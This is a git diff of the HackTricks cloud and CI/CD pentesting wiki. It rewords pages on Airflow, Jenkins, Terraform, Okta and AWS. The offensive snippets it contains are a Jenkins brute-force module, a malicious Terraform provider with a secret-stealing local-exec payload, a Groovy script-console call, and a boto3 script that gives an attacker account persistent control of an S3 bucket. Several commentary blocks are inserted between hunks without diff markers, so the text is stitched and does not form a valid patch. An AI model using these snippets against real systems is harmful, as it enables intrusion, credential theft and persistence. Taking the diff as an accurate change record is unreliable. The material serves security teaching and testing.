diff --git a/SUMMARY.md b/SUMMARY.md
index 3b46f64792..468cbc954f 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -30,7 +30,6 @@
 * [Jenkins RCE Creating/Modifying Project](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md)
 * [Jenkins RCE Creating/Modifying Pipeline](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md)
 * [Jenkins Dumping Secrets from Groovy](pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md)
- * [SCM IP Whitelisting Bypass](pentesting-ci-cd/jenkins-security/scm-ip-whitelisting-bypass.md)
 * [Apache Airflow Security](pentesting-ci-cd/apache-airflow-security/README.md)
 * [Airflow Configuration](pentesting-ci-cd/apache-airflow-security/airflow-configuration.md)
 * [Airflow RBAC](pentesting-ci-cd/apache-airflow-security/airflow-rbac.md)
@@ -214,7 +213,6 @@
 * [AWS - DynamoDB Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md)
 * [AWS - EC2, EBS, SSM & VPC Post Exploitation](pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md)
 * [AWS - EBS Snapshot Dump](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md)
- * [AWS - SSM Post-Exploitation](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-ssm-post-exploitation.md)
 * [AWS - Malicious VPC Mirror](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-malicious-vpc-mirror.md)
 * [AWS - ECR Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md)
 * [AWS - ECS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md)
diff --git a/pentesting-ci-cd/apache-airflow-security/README.md b/pentesting-ci-cd/apache-airflow-security/README.md
index 21c447533a..9d30aa2f07 100644
--- a/pentesting-ci-cd/apache-airflow-security/README.md
+++ b/pentesting-ci-cd/apache-airflow-security/README.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 ## Basic Information
-[**Apache Airflow**](https://airflow.apache.org) is used for the **scheduling and \_orchestration of data pipelines or workflows**. Orchestration of data pipelines refers to the sequencing, coordination, scheduling, and managing complex **data pipelines from diverse sources**. These data pipelines deliver data sets that are ready for consumption either by business intelligence applications and data science, machine learning models that support big data applications.
+[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications.
 Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**.
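To make this concrete, the following is a minimal sketch of what such a scheduled DAG could look like, assuming Airflow 2.x syntax (the DAG id, schedule and command are purely illustrative):

```python
from datetime import datetime

from airflow import DAG
from airflow.operators.bash import BashOperator

# A DAG is just Python code: whatever its tasks run is executed by the scheduler/workers
with DAG(
    dag_id="scheduled_code_example",   # hypothetical name
    start_date=datetime(2023, 1, 1),
    schedule_interval="0 * * * *",     # cron expression: run at minute 0 of every hour
    catchup=False,
) as dag:
    BashOperator(
        task_id="run_code",
        bash_command="id; hostname",   # any shell command placed here gets executed
    )
```

This is also why arbitrary DAG creation or execution is so interesting offensively: a DAG is arbitrary code run on a schedule.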
@@ -77,7 +77,7 @@ Airflow by default will show the value of the variable in the GUI, however, acco
 ![](<../../.gitbook/assets/image (79).png>)
 However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\
-****To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\
+To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\
 Another way is to **bruteforce** the **hidden value** using the **search filter** until you get it:
 ![](<../../.gitbook/assets/image (30).png>)
diff --git a/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md b/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
index 35869deb4e..3075f7948e 100644
--- a/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
+++ b/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 ## RBAC
-Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles.
+[From the docs](https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html): Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users can **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles.
 * **`Admin`** users have all possible permissions.
 * **`Public`** users (anonymous) don’t have any permissions.
diff --git a/pentesting-ci-cd/atlantis-security.md b/pentesting-ci-cd/atlantis-security.md
index 4a9801096e..f56a173530 100644
--- a/pentesting-ci-cd/atlantis-security.md
+++ b/pentesting-ci-cd/atlantis-security.md
@@ -53,6 +53,8 @@ Atlantis is going to be **exposing webhooks** so the git server can send it info
 ### Provider Credentials
+[From the docs](https://www.runatlantis.io/docs/provider-credentials.html):
+
 Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.
 It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis:
@@ -401,6 +403,7 @@ You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true`
 ## References
 * [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs)
+* [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html)
diff --git a/pentesting-ci-cd/circleci-security.md b/pentesting-ci-cd/circleci-security.md
index 59f2267bd7..657692afb9 100644
--- a/pentesting-ci-cd/circleci-security.md
+++ b/pentesting-ci-cd/circleci-security.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 ## Basic Information
-[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you ca **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example.
+[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuous Integration platform where you can **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example.
 ## Permissions
diff --git a/pentesting-ci-cd/concourse-security/concourse-architecture.md b/pentesting-ci-cd/concourse-security/concourse-architecture.md
index fd4f8625c0..2a08efad8b 100644
--- a/pentesting-ci-cd/concourse-security/concourse-architecture.md
+++ b/pentesting-ci-cd/concourse-security/concourse-architecture.md
@@ -39,6 +39,10 @@ In order to execute tasks concourse must have some workers. These workers **regi
 * **Garden**: This is the **Container Management API**, which usually runs on **port 7777** via **HTTP**.
 * **Baggageclaim**: This is the **Volume Management API**, which usually runs on **port 7788** via **HTTP**.
## References
* [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html)

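As a side note on the worker APIs listed above: Garden speaks plain, unauthenticated HTTP, so if a worker is directly reachable a quick check is trivial. A sketch, assuming the `GET /containers` listing endpoint of Garden's REST API and a hypothetical worker address:

```python
import requests

# Hypothetical worker address; Garden normally listens only on the internal worker network
garden = "http://10.0.0.5:7777"

# Listing container handles is a quick way to confirm the API is exposed
resp = requests.get(f"{garden}/containers", timeout=5)
print(resp.status_code, resp.json())
```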
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md b/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
index fea48eef1c..4ade32fc41 100644
--- a/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
+++ b/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
@@ -32,7 +32,7 @@ Note that Concourse **groups pipelines inside Teams**. Therefore users belonging
 ## Vars & Credential Manager
-In the YAML configs you can configure values using the syntax `((`_`source-name`_`:`_`secret-path`_`.`_`secret-field`_`))`.\
+In the YAML configs you can configure values using the syntax `((_source-name_:_secret-path_._secret-field_))`.\
 The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\
 The optional _**secret-field**_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\
 Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`.
@@ -451,6 +451,9 @@
User-Agent: Go-http-client/1.1.
Accept-Encoding: gzip.
```
## References
* [https://concourse-ci.org/vars.html](https://concourse-ci.org/vars.html)
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/pentesting-ci-cd/jenkins-security/README.md b/pentesting-ci-cd/jenkins-security/README.md
index 89521bcda7..e729e63db6 100644
--- a/pentesting-ci-cd/jenkins-security/README.md
+++ b/pentesting-ci-cd/jenkins-security/README.md
@@ -16,8 +16,8 @@ Other ways to support HackTricks:
 ## Basic Information
-Jenkins offers a simple way to set up a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **languages** and source code repositories using pipelines, as well as automating other routine development tasks. While Jenkins doesn’t eliminate the **need to create scripts for individual steps**, it does give you a faster and more robust way to integrate your entire chain of build, test, and deployment tools than you can easily build yourself.\
-Definition from [here](https://www.infoworld.com/article/3239666/what-is-jenkins-the-ci-server-explained.html).
+Jenkins is a tool that offers a straightforward method for establishing a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **programming languages** and source code repositories using pipelines. Furthermore, it automates various routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does provide a faster and more robust way to integrate the entire sequence of build, test, and deployment tools than one can easily construct manually.
+
{% content-ref url="basic-jenkins-information.md" %}
[basic-jenkins-information.md](basic-jenkins-information.md)
{% endcontent-ref %}
@@ -65,7 +65,7 @@ Also if **SSO** **functionality**/**plugins** were present then you should attem
 ### Bruteforce
-**Jekins** does **not** implement any **password policy** or username **brute-force mitigation**. Then, you **should** always try to **brute-force** users because probably **weak passwords** are being used (even **usernames as passwords** or **reverse** usernames as passwords).
+**Jenkins** lacks a **password policy** and **username brute-force mitigation**. It's essential to **brute-force** users since **weak passwords** or **usernames as passwords** may be in use, even **reversed usernames as passwords**.
```
msf> use auxiliary/scanner/http/jenkins_login
@@ -77,13 +77,13 @@ Use [this python script](https://github.com/gquere/pwn\_jenkins/blob/master/pass
 ### IP Whitelisting Bypass
-Many orgs combines **SaaS-based source control management (SCM) systems** (like GitHub or GitLab) with an **internal**, self-hosted **CI** solution (e.g. Jenkins, TeamCity) allowing these CI systems to **receive webhook events from the SaaS source** control vendors, for the simple purpose of triggering pipeline jobs.
+Many organizations combine **SaaS-based source control management (SCM) systems** such as GitHub or GitLab with an **internal, self-hosted CI** solution like Jenkins or TeamCity. This setup allows CI systems to **receive webhook events from SaaS source control vendors**, primarily for triggering pipeline jobs.
-Therefore, the orgs **whitelists** the **IP** ranges of the **SCM** allowing them to reach the **internal** CI system with **webhooks**. However, note how **anyone** can create an **account** in Github or Gitlab and make it **trigger a webhook** that could send a request to that **internal CI system**.
+To achieve this, organizations **whitelist** the **IP ranges** of the **SCM platforms**, permitting them to access the **internal CI system** via **webhooks**. However, it's important to note that **anyone** can create an **account** on GitHub or GitLab and configure it to **trigger a webhook**, potentially sending requests to the **internal CI system**.
-{% content-ref url="scm-ip-whitelisting-bypass.md" %}
-[scm-ip-whitelisting-bypass.md](scm-ip-whitelisting-bypass.md)
-{% endcontent-ref %}
+
+Check:
+[https://www.cidersecurity.io/blog/research/how-we-abused-repository-webhooks-to-access-internal-ci-systems-at-scale/](https://www.cidersecurity.io/blog/research/how-we-abused-repository-webhooks-to-access-internal-ci-systems-at-scale/)
 ## Internal Jenkins Abuses
@@ -125,7 +125,7 @@ You will usually find Jenkins ssh credentials in a **global provider** (`/creden
 Getting a **shell in the Jenkins server** gives the attacker the opportunity to leak all the **secrets** and **env variables** and to **exploit other machines** located in the same network or even **gather cloud credentials**.
-By default, Jenkins will **“run as system” builds**. In other words, they assign it to the **all-powerful SYSTEM user**, meaning any action executed during the build has permission to do whatever it wants.
+By default, Jenkins will **run as SYSTEM**. So, compromising it will give the attacker **SYSTEM privileges**.
 ### **RCE Creating/Modifying a project**
@@ -403,6 +403,7 @@ println(hudson.util.Secret.decrypt("{...}"))
 * [https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password](https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password)
 * [https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html](https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html)
 * [https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072](https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072)
+* [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3)
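As a practical companion to the Groovy-based pages referenced above, note that script-console code can also be submitted over HTTP through the `/scriptText` endpoint. A minimal sketch (host and credentials are placeholders; authenticating with an API token avoids having to fetch a CSRF crumb):

```python
import requests

jenkins = "https://jenkins.example.com"  # hypothetical target
auth = ("someuser", "user-api-token")    # username + API token

# Any Groovy submitted here runs with the permissions of the authenticated user
groovy = 'println(System.getenv("PATH"))'
resp = requests.post(f"{jenkins}/scriptText", auth=auth, data={"script": groovy})
print(resp.text)
```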
diff --git a/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md b/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
index 0735196e99..42c2eeff53 100644
--- a/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
+++ b/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
@@ -67,6 +67,8 @@ Plugins can provide additional security realms which may be useful for incorpora
 ## Jenkins Nodes, Agents & Executors
+Definitions from the [docs](https://www.jenkins.io/doc/book/managing/nodes/):
+
 **Nodes** are the **machines** on which build **agents run**. Jenkins monitors each attached node for disk space, free temp space, free swap, clock time/sync and response time. A node is taken offline if any of these values go outside the configured threshold.
 **Agents** **manage** the **task execution** on behalf of the Jenkins controller by **using executors**. An agent can use any operating system that supports Java. Tools required for builds and tests are installed on the node where the agent runs; they can **be installed directly or in a container** (Docker or Kubernetes). Each **agent is effectively a process with its own PID** on the host machine.
@@ -77,6 +79,7 @@ An **executor** is a **slot for execution of tasks**; effectively, it is **a thr
 ### Encryption of Secrets and Credentials
+Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials):
 Jenkins uses **AES to encrypt and protect secrets**, credentials, and their respective encryption keys. These encryption keys are stored in `$JENKINS_HOME/secrets/` along with the master key used to protect said keys. This directory should be configured so that only the operating system user the Jenkins controller is running as has read and write access to this directory (i.e., a `chmod` value of `0700` or using appropriate file attributes). The **master key** (sometimes referred to as a "key encryption key" in cryptojargon) is stored _**unencrypted**_ on the Jenkins controller filesystem in **`$JENKINS_HOME/secrets/master.key`** which does not protect against attackers with direct access to that file. Most users and developers will use these encryption keys indirectly via either the [Secret](https://javadoc.jenkins.io/byShortName/Secret) API for encrypting generic secret data or through the credentials API. For the cryptocurious, Jenkins uses AES in cipher block chaining (CBC) mode with PKCS#5 padding and random IVs to encrypt instances of [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) which are stored in `$JENKINS_HOME/secrets/` with a filename corresponding to their `CryptoConfidentialKey` id.
Common key ids include:
* `hudson.util.Secret`: used for generic secrets;
@@ -96,6 +99,10 @@ According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-m
 * [https://www.jenkins.io/doc/book/security/managing-security/](https://www.jenkins.io/doc/book/security/managing-security/)
 * [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
 * [https://www.jenkins.io/doc/developer/security/secrets/](https://www.jenkins.io/doc/developer/security/secrets/)
+* [https://www.jenkins.io/blog/2019/02/21/credentials-masking/](https://www.jenkins.io/blog/2019/02/21/credentials-masking/)
+* [https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery)
+* [https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials)
diff --git a/pentesting-ci-cd/okta-security/README.md b/pentesting-ci-cd/okta-security/README.md
index 7b91bd6523..c09e565cae 100644
--- a/pentesting-ci-cd/okta-security/README.md
+++ b/pentesting-ci-cd/okta-security/README.md
@@ -16,11 +16,17 @@ Other ways to support HackTricks:
 ## Basic Information
-Okta, Inc. is an **identity and access management company** that provides cloud software to help companies **manage and secure user authentication into modern applications**, and for developers to build identity controls into applications, website web services and devices.
+[Okta, Inc.](https://www.okta.com/) is recognized in the identity and access management sector for its cloud-based software solutions. These solutions are designed to streamline and secure user authentication across various modern applications. They cater not only to companies aiming to safeguard their sensitive data but also to developers interested in integrating identity controls into applications, web services, and devices.
-Their core service, called the Okta Identity Cloud, offers products that include single sign-on (SSO), multi-factor authentication (MFA), lifecycle management, universal directory, API access management, and more. This helps companies to both protect their sensitive data and also streamline user access, making applications and services more accessible and easy to use for employees or customers.
+The flagship offering from Okta is the **Okta Identity Cloud**. This platform encompasses a suite of products, including but not limited to:
-Okta's services are widely used in enterprise contexts, as well as by smaller companies and developers. It plays a crucial role in enabling businesses to securely adopt and manage cloud technologies. As of my knowledge cutoff in September 2021, Okta remains a significant player in the Identity and Access Management (IAM) industry.
+- **Single Sign-On (SSO)**: Simplifies user access by allowing one set of login credentials across multiple applications.
+- **Multi-Factor Authentication (MFA)**: Enhances security by requiring multiple forms of verification.
+- **Lifecycle Management**: Automates user account creation, update, and deactivation processes.
+- **Universal Directory**: Enables centralized management of users, groups, and devices.
+- **API Access Management**: Secures and manages access to APIs.
+
+These services collectively aim to fortify data protection and streamline user access, enhancing both security and convenience. The versatility of Okta's solutions makes them a popular choice across various industries, beneficial to large enterprises, small companies, and individual developers alike. As of the last update in September 2021, Okta is acknowledged as a prominent entity in the Identity and Access Management (IAM) arena.
{% hint style="danger" %}
The main goal of Okta is to configure access for different users and groups to external applications. If you manage to **compromise administrator privileges in an Okta** environment, you will very probably be able to **compromise all the other platforms the company is using**.
diff --git a/pentesting-ci-cd/okta.md b/pentesting-ci-cd/okta.md
index fa9f1e4973..2772d38a9f 100644
--- a/pentesting-ci-cd/okta.md
+++ b/pentesting-ci-cd/okta.md
@@ -16,11 +16,17 @@ Other ways to support HackTricks:
 ## Basic Information
-Okta, Inc.
is an **identity and access management company** that provides cloud software to help companies **manage and secure user authentication into modern applications**, and for developers to build identity controls into applications, website web services and devices.
+[Okta, Inc.](https://www.okta.com/) is recognized in the identity and access management sector for its cloud-based software solutions. These solutions are designed to streamline and secure user authentication across various modern applications. They cater not only to companies aiming to safeguard their sensitive data but also to developers interested in integrating identity controls into applications, web services, and devices.
-Their core service, called the Okta Identity Cloud, offers products that include single sign-on (SSO), multi-factor authentication (MFA), lifecycle management, universal directory, API access management, and more. This helps companies to both protect their sensitive data and also streamline user access, making applications and services more accessible and easy to use for employees or customers.
+The flagship offering from Okta is the **Okta Identity Cloud**. This platform encompasses a suite of products, including but not limited to:
-Okta's services are widely used in enterprise contexts, as well as by smaller companies and developers. It plays a crucial role in enabling businesses to securely adopt and manage cloud technologies. As of my knowledge cutoff in September 2021, Okta remains a significant player in the Identity and Access Management (IAM) industry.
+- **Single Sign-On (SSO)**: Simplifies user access by allowing one set of login credentials across multiple applications.
+- **Multi-Factor Authentication (MFA)**: Enhances security by requiring multiple forms of verification.
+- **Lifecycle Management**: Automates user account creation, update, and deactivation processes.
+- **Universal Directory**: Enables centralized management of users, groups, and devices.
+- **API Access Management**: Secures and manages access to APIs.
+
+These services collectively aim to fortify data protection and streamline user access, enhancing both security and convenience. The versatility of Okta's solutions makes them a popular choice across various industries, beneficial to large enterprises, small companies, and individual developers alike. As of the last update in September 2021, Okta is acknowledged as a prominent entity in the Identity and Access Management (IAM) arena.
{% hint style="danger" %}
The main goal of Okta is to configure access for different users and groups to external applications. If you manage to **compromise administrator privileges in an Okta** environment, you will very probably be able to **compromise all the other platforms the company is using**.
diff --git a/pentesting-ci-cd/terraform-security.md b/pentesting-ci-cd/terraform-security.md
index 918cce7f9a..ab0ba11121 100644
--- a/pentesting-ci-cd/terraform-security.md
+++ b/pentesting-ci-cd/terraform-security.md
@@ -16,6 +16,8 @@ Other ways to support HackTricks:
 ## Basic Information
+[From the docs](https://developer.hashicorp.com/terraform/intro):
+
 HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle.
Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features.
 ### How does Terraform work?
@@ -34,15 +36,6 @@ The core Terraform workflow consists of three stages:
 ![](<../.gitbook/assets/image (81).png>)
-### Terraform Enterprise
-
-Terraform Enterprise allows you to **run commands** such as `terraform plan` or `terraform apply` remotely in a **self-hosted version of Terraform Cloud**. Therefore, if you find the **API key** to access that Terraform server, you can **compromise it**.\
-For more info check:
-
-{% content-ref url="broken-reference" %}
-[Broken link](broken-reference)
-{% endcontent-ref %}
-
 ## Terraform Lab
 Just install Terraform on your computer.
@@ -83,14 +76,7 @@ data "external" "example" {
 #### Using a custom provider
-Anyone can write a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) and publish it to the [Terraform Registry](https://registry.terraform.io/). You could also try to pull a custom provider from a private registry.
-
-That’s it:
-
-* write a custom provider than runs some malicious code (like exfiltrating credentials or customer data)
- * publish it to the Terraform Registry
- * add the provider to the Terraform code in a feature branch
- * open a PR for the feature branch
+An attacker could upload a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) to the [Terraform Registry](https://registry.terraform.io/) and then add it to the Terraform code in a feature branch ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)):
```javascript
terraform {
@@ -105,7 +91,7 @@ That’s it:
 provider "evil" {}
```
-Since the provider will be pulled in during the `init` and run some code during the `plan`, you have arbitrary code execution.
+The provider is downloaded during `init` and will run the malicious code when `plan` is executed.
 You can find an example in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec)
@@ -128,7 +114,7 @@ You can find the rev shell code in [https://github.com/carlospolop/terraform\_ex
 ### Terraform Apply
 Terraform apply will be executed to apply all the changes; you can also abuse it to obtain RCE by injecting **a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
-\*\*\*\*You just need to make sure some payload like the following ones ends in the `main.tf` file:
+You just need to make sure some payload like the following ones ends up in the `main.tf` file:
```json
// Payload 1 to just steal a secret
@@ -167,6 +153,8 @@ output "dotoken" {
 * [Atlantis Security](atlantis-security.md)
 * [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce)
+* [https://developer.hashicorp.com/terraform/intro](https://developer.hashicorp.com/terraform/intro)
+
diff --git a/pentesting-cloud/aws-pentesting/aws-persistence/aws-s3-persistence.md b/pentesting-cloud/aws-pentesting/aws-persistence/aws-s3-persistence.md
index 27abe577e7..1344910851 100644
--- a/pentesting-cloud/aws-pentesting/aws-persistence/aws-s3-persistence.md
+++ b/pentesting-cloud/aws-pentesting/aws-persistence/aws-s3-persistence.md
@@ -32,7 +32,7 @@ Therefore, and attacker could get this key from the metadata and decrypt with KM
 ### Using S3 ACLs
-Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if they can enable team) to keep access to the S3 bucket.
+Although bucket ACLs are usually disabled, an attacker with enough privileges could abuse them (if they are enabled, or if the attacker can enable them) to keep access to the S3 bucket.
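A sketch of what that persistence could look like with boto3 (the bucket name and canonical user ID are placeholders, and re-enabling ACLs additionally assumes the `s3:PutBucketOwnershipControls` permission):

```python
import boto3

s3 = boto3.client("s3")
bucket = "victim-bucket"                         # hypothetical
attacker_canonical_id = "attacker-canonical-id"  # hypothetical canonical user ID

# If ACLs were disabled via BucketOwnerEnforced, switch ownership so ACLs apply again
s3.put_bucket_ownership_controls(
    Bucket=bucket,
    OwnershipControls={"Rules": [{"ObjectOwnership": "ObjectWriter"}]},
)

# Grant the external (attacker) account full control over the bucket through its ACL
s3.put_bucket_acl(Bucket=bucket, GrantFullControl=f"id={attacker_canonical_id}")
```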
diff --git a/pentesting-cloud/aws-pentesting/aws-services/aws-kinesis-data-firehose-enum.md b/pentesting-cloud/aws-pentesting/aws-services/aws-kinesis-data-firehose-enum.md
index 2c60aa658e..a46939312d 100644
--- a/pentesting-cloud/aws-pentesting/aws-services/aws-kinesis-data-firehose-enum.md
+++ b/pentesting-cloud/aws-pentesting/aws-services/aws-kinesis-data-firehose-enum.md
@@ -16,8 +16,9 @@ Other ways to support HackTricks:
 ## Kinesis Data Firehose
-Amazon Kinesis Data Firehose is a **fully managed service for delivering real-time** [**streaming data**](http://www.amazonaws.cn/streaming-data/) **to destinations** such as Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, and any custom HTTP endpoint.\
-With Kinesis Data Firehose, you don't need to write applications or manage resources. You **configure your data producers** to send data to Kinesis Data Firehose, and it **automatically delivers the data to the destination** that you specified. You can also configure Kinesis Data Firehose **to transform your data before delivering it**.
+Amazon Kinesis Data Firehose is a **fully managed service** that facilitates the delivery of **real-time streaming data**. It supports a variety of destinations, including Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, and custom HTTP endpoints.
+
+The service alleviates the need for writing applications or managing resources by allowing data producers to be configured to forward data directly to Kinesis Data Firehose. This service is responsible for the **automatic delivery of data to the specified destination**. Additionally, Kinesis Data Firehose provides the option to **transform the data prior to its delivery**, enhancing its flexibility and applicability to various use cases.
 ### Enumeration
diff --git a/pentesting-cloud/aws-pentesting/aws-services/aws-organizations-enum.md b/pentesting-cloud/aws-pentesting/aws-services/aws-organizations-enum.md
index e4677cd8a2..826dd5f1ff 100644
--- a/pentesting-cloud/aws-pentesting/aws-services/aws-organizations-enum.md
+++ b/pentesting-cloud/aws-pentesting/aws-services/aws-organizations-enum.md
@@ -16,7 +16,13 @@ Other ways to support HackTricks:
 ## Basic Information
-AWS Organizations lets you create new AWS accounts at no additional charge. With accounts in an organization, you can easily allocate resources, group accounts, and apply governance policies to accounts or groups.
+AWS Organizations facilitates the creation of new AWS accounts without incurring additional costs. Resources can be allocated effortlessly, accounts can be efficiently grouped, and governance policies can be applied to individual accounts or groups, enhancing management and control within the organization.
+
+Key Points:
+- **New Account Creation**: AWS Organizations allows the creation of new AWS accounts without extra charges.
+- **Resource Allocation**: It simplifies the process of allocating resources across the accounts.
+- **Account Grouping**: Accounts can be grouped together, making management more streamlined.
+- **Governance Policies**: Policies can be applied to accounts or groups of accounts, ensuring compliance and governance across the organization.
 You can find more information in:
@@ -45,6 +51,9 @@ aws organizations list-accounts-for-parent --parent-id ou-n8s9-8nzv3a5y
aws iam get-account-summary
```
## References
* [https://aws.amazon.com/organizations/](https://aws.amazon.com/organizations/)

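Since the governance policies mentioned above (service control policies) define what member accounts are allowed to do, dumping them is usually worthwhile. A boto3 sketch, assuming permissions such as `organizations:ListPolicies` and `organizations:DescribePolicy`:

```python
import boto3

org = boto3.client("organizations")

# Enumerate service control policies and print each one's JSON document
for pol in org.list_policies(Filter="SERVICE_CONTROL_POLICY")["Policies"]:
    detail = org.describe_policy(PolicyId=pol["Id"])
    print(pol["Name"], "->", detail["Policy"]["Content"])
```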
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/pentesting-cloud/aws-security/aws-basic-information/README.md b/pentesting-cloud/aws-security/aws-basic-information/README.md
index ce5ea96f18..e6f27e3079 100644
--- a/pentesting-cloud/aws-security/aws-basic-information/README.md
+++ b/pentesting-cloud/aws-security/aws-basic-information/README.md
@@ -171,7 +171,7 @@ An IAM role consists of **two types of policies**: A **trust policy**, which can
 #### AWS Security Token Service (STS)
-This is a web service that enables you to **request temporary, limited-privilege credentials** for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users).
+AWS Security Token Service (STS) is a web service that facilitates the **issuance of temporary, limited-privilege credentials** for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users).
 ### [Temporary credentials in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id\_credentials\_temp.html)
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
